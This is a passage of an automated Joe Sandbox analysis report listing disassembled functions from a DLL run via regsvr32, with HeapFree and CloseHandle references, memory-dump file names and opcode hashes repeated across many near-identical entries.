HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: c81cfafdec61214b7d7a417e16ef500a21d3416b489dcbe3cc133d4bb35a3015
Instruction ID: 7360f7a8253d5c0daca415750e36ad12360274f7041b36aa956a14449dfdac96
Opcode Fuzzy Hash: c81cfafdec61214b7d7a417e16ef500a21d3416b489dcbe3cc133d4bb35a3015
Instruction Fuzzy Hash: 03212C21D0EDC2A0F664EF9194543FE6271FF887C4F4460B2D94ECAAD6CF6EE4449201

Function 00007FF8A9307D52 Relevance: 6.3, APIs: 5, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9307D98
HeapFree.KERNEL32 ref: 00007FF8A9308569
HeapFree.KERNEL32 ref: 00007FF8A93086A5
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 347ee7b86054963f62756996406dc54c49090177fe0620663a978de592d0cae5
Instruction ID: 267a39bb34c31fe9b650f8b064a2928081a3a785d3ed7fa3f8f136b1c07d43cf
Opcode Fuzzy Hash: 347ee7b86054963f62756996406dc54c49090177fe0620663a978de592d0cae5
Instruction Fuzzy Hash: C2217110D0EEC2A0F660EF5694183FA66B1EF887C4F4460B1DA4ECAAD6CF7EE400D601

Function 00007FF8A9308144 Relevance: 6.3, APIs: 5, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A9301660: HeapFree.KERNEL32 ref: 00007FF8A930167B

HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 973a582d513d9af513f8eec73152e4f9680ce93a101672e0634a89effb87cb13
Instruction ID: 5ad0e5b1c81438ee00605f7d6c2f3783aab4e0072eeedf457d1153b207a2128b
Opcode Fuzzy Hash: 973a582d513d9af513f8eec73152e4f9680ce93a101672e0634a89effb87cb13
Instruction Fuzzy Hash: DD211D2190EEC2A0FA64EF9194543FA6271FF897C4F446076D94DCAA9ACF7EE4449201

Function 00007FF8A930811E Relevance: 6.3, APIs: 5, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930178D
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017BD
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017D8
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930180E
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301824
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A930183A
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301853

HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: de086dee4c0585faf8604eba3a52c1caf0197a4a9d1370239ad03a54a5aa2bfa
Instruction ID: 24452a48cbca51996738fbddd86df51f39ef2e6d9a0d1b642bffdb968ea30bcd
Opcode Fuzzy Hash: de086dee4c0585faf8604eba3a52c1caf0197a4a9d1370239ad03a54a5aa2bfa
Instruction Fuzzy Hash: 89211D25D0EDC2A0F664EF9194543FA6271FF897C4F446072D94ECAAD6CF7EE4449201

Function 00007FF8A9308132 Relevance: 6.3, APIs: 5, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0a35b4d5bd2b94760577c78a406f28a14c5adedeb43a7d06f6af1d9420098c4a
Instruction ID: 2420c8575efcd8332302b24d875ede3a5259f702abcb351e70d5d29ea64e29f5
Opcode Fuzzy Hash: 0a35b4d5bd2b94760577c78a406f28a14c5adedeb43a7d06f6af1d9420098c4a
Instruction Fuzzy Hash: F4214121D0EDC2A0F664EF9194143FA5271FF887C4F446072D94DCAAD6CFBED0449241

Function 00007FF8A9308042 Relevance: 6.3, APIs: 5, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 21e9543109a9c9e2d93063b8f9d43beb704df71e964379078fee89bbb6bf6d0f
Instruction ID: 8ee907aa7d4e6b07999d1a41c30c967136e81c8532b1e13ead821cff8a321eaa
Opcode Fuzzy Hash: 21e9543109a9c9e2d93063b8f9d43beb704df71e964379078fee89bbb6bf6d0f
Instruction Fuzzy Hash: FE212C25D0EEC2A0F664EF9194143FA6271FF887C4F446076D94ECAAD6CFBEE0449241

Function 00007FF8A9307F95 Relevance: 6.3, APIs: 5, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 802f2ac2fdf6c611206054f64869c7a7ecbbc247fa70cfbec9611b79bb94ca69
Instruction ID: 80718ad4eb406ff4ccc5e30985f8f59a124eb8566e4faa85a3ddb7a87ccb8e4d
Opcode Fuzzy Hash: 802f2ac2fdf6c611206054f64869c7a7ecbbc247fa70cfbec9611b79bb94ca69
Instruction Fuzzy Hash: EB212C25D0EDC2A0F664EF9290143FA6271FF887C4F4460B2D94ECAAD6CFBEE4449201

Function 00007FF8A93081BC Relevance: 6.3, APIs: 5, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93081DB
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6cd09edfb741195c4b0dd663107b2fc4283678d1cb304eda37382fd6181d6dc2
Instruction ID: a916e31d9bdbf116f305717014570d440062fb02ba1eed98dc6344dd0332e195
Opcode Fuzzy Hash: 6cd09edfb741195c4b0dd663107b2fc4283678d1cb304eda37382fd6181d6dc2
Instruction Fuzzy Hash: 5D210C25D0EEC2A0F664EF9194143FA62B1EF887C4F446076D94ECAA96CFBED4449201

Function 00007FF8A93083EC Relevance: 6.3, APIs: 5, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9308420
HeapFree.KERNEL32 ref: 00007FF8A9308441
HeapFree.KERNEL32 ref: 00007FF8A930846C
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b9028015490bb83336510eb6d59fa7bdae8f1ba519b7102ff93fc6972d8863b3
Instruction ID: b2fb237369b9ee937f57b1fded4a245108f12b9a259e9e7a88dabd3cae4247c8
Opcode Fuzzy Hash: b9028015490bb83336510eb6d59fa7bdae8f1ba519b7102ff93fc6972d8863b3
Instruction Fuzzy Hash: ED211A2190EDC2A0FA64EF6694543FB62B1EFC87C4F446072DA4DCAA9ACF7ED4449601

Function 00007FF8A9308386 Relevance: 6.3, APIs: 5, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9308420
HeapFree.KERNEL32 ref: 00007FF8A9308441
HeapFree.KERNEL32 ref: 00007FF8A930846C
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 8aaad0215af1a416beb6ec1f73dd422ac0c8d67c1e611777a3087611cfd16b98
Instruction ID: 3ca93e1311f0f7f7bd282f5bf3d9042e6a89c4adea91526fd084a643d035ebef
Opcode Fuzzy Hash: 8aaad0215af1a416beb6ec1f73dd422ac0c8d67c1e611777a3087611cfd16b98
Instruction Fuzzy Hash: A9211A2190EDC2A0FA64EF56A4543FB6271EFC87C4F446072DA4ECBA9ACF7ED4449601

Function 00007FF8A9307D50 Relevance: 6.3, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9308548
HeapFree.KERNEL32 ref: 00007FF8A9308569
HeapFree.KERNEL32 ref: 00007FF8A93086A5
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 412250ffd94d3f92b82567a5006ccbf80c148f0be6c78c040030f73ceef7b9bc
Instruction ID: eb36cee82b6ddd4e4577791e9bb53d8aa25f963ae6105b69d8ac32ecfd3892ca
Opcode Fuzzy Hash: 412250ffd94d3f92b82567a5006ccbf80c148f0be6c78c040030f73ceef7b9bc
Instruction Fuzzy Hash: 17213A2190EEC2A0F660EF5694183FA6271FFC87C4F446072D54ECAA9ACF7EE0449601

Function 00007FF8A9308010 Relevance: 6.3, APIs: 5, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9308548
HeapFree.KERNEL32 ref: 00007FF8A9308569
HeapFree.KERNEL32 ref: 00007FF8A93086A5
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5c7418ecb9874727564476e982fb176cb60d973220dbc7b64b29b929e6a7bda4
Instruction ID: 31deb138753508affa2c632787b9b9f3d2b842e24f4982e5a9560c838f307a46
Opcode Fuzzy Hash: 5c7418ecb9874727564476e982fb176cb60d973220dbc7b64b29b929e6a7bda4
Instruction Fuzzy Hash: F321291190EEC2A0F664EF9694583FA62B1EFC87C4F446075D64ECAA9ACF7EE0449601

Function 00007FF8A9307DC4 Relevance: 6.3, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9308548
HeapFree.KERNEL32 ref: 00007FF8A9308569
HeapFree.KERNEL32 ref: 00007FF8A93086A5
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 096b6fa724d70a193df5d31adb74ca4b6b7b7b4d1035b8f890a5399c994b9549
Instruction ID: 696215358a61b399a7a3dbf888b3db38405a8239f07cd42fa293f2762ca95434
Opcode Fuzzy Hash: 096b6fa724d70a193df5d31adb74ca4b6b7b7b4d1035b8f890a5399c994b9549
Instruction Fuzzy Hash: FA214A1190EEC2A0F620EF5694583FA62B1FFC87C4F446072D64ECAA9ACE7EE0449601

Function 00007FF8A9307EB4 Relevance: 6.3, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9307EC3
HeapFree.KERNEL32 ref: 00007FF8A9308569
HeapFree.KERNEL32 ref: 00007FF8A93086A5
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 74f2d71cddd68faeabf9a41f9ff90989954d8ac98b51e2ff1940b327a7378041
Instruction ID: 914d43191a0555ab7985bb3b03145c0201f5b745816e1e2ac275d67c200d4755
Opcode Fuzzy Hash: 74f2d71cddd68faeabf9a41f9ff90989954d8ac98b51e2ff1940b327a7378041
Instruction Fuzzy Hash: D7113010D0EEC2A0F624EF5694543FA6671FFC87C4F446075D64ECA6D6CE7EE0049601

Function 00007FF8A930839C Relevance: 6.3, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9308776
HeapFree.KERNEL32 ref: 00007FF8A93087AE
CloseHandle.KERNEL32 ref: 00007FF8A93087B8
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
